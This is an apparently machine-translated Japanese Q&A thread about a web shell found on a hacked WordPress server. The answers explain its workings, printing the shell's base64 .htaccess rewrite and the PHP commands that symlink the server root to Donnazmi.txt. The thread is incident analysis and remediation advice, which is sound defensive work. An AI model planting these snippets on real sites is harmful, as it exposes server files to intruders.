昨日、これがあることを発見しました http://Pastebin.com/MRRny4Ht PHP友達のサーバーにあるファイル。ハッカーがどのようにアップロードできたか知りたい私は同じような質問を読みましたが、正しい答えを見つけることができませんでした。
編集:-
今日、WordPressサイトがパスワードを総当たりすることによって侵害された(パスワードは強力です)ことを知りました。)彼らがどのようにしてそのパスワードを解読したのかはまだわかりません。
パスワードをクラックした後、ログインしてphpファイルをアップロードしました。Donnazmi.txtについてグーグル検索した後、他の多くのサイトも同じ日に(7月13日)ハッキングされていることがわかりました。同じスクリプトを使用したハックはまだ進行中です。 WordPressサーバーのパスワードがより複雑なものに変更され、それらのphpファイルが削除されました。
回答・コメントありがとうございます。申し訳ありませんが、質問を投稿する際に詳細をお知らせする必要がありました。
ファイルがサーバーにアップロードされると( wordpress theme のバグを悪用して))、.htaccess
は、.txt
ファイルは、サーバーによって.php
スクリプトとして解釈され、シンボリックリンクに従います。
次のステップはトリックです。彼は symlink を/
からDonnazmi.txt
に変換します(2つの方法)
コードは実際には複雑ではありません。エクスプロイトステップを実行するために必要な設定を含むHTMLフォームを出力します(表示するにはDonnazmi
を投稿キーとして投稿リクエストを送信する必要があります)。
コードの説明:
.htaccess
reconfig:
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
これはbase64でエンコードされた文字列で、次のように変換されます。
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
だからその設定で:
$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem));
// write the new config inside the file
シンボリックリンク:
// 1. this is a link with the linux comand `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");
実行後、彼はexample.com/Donnazmi.txtにアクセスするたびに、サーバーのルートディレクトリのリストを表示します(Options Indexes
tm)。
はい、そのマシンを再構築します。インストールする前にソフトウェアを確認してください。
私が見つけたビデオは、ハッカーの名前をグーグルで検索したときに最初に出てきたものです。
たまたまWordpress Cold Fusionテーマがインストールされていますか?
これがいわゆる モーリタニアの攻撃者のビデオ であり、特定のWordPressテーマを利用してサーバーにファイルをアップロードする方法を説明しています。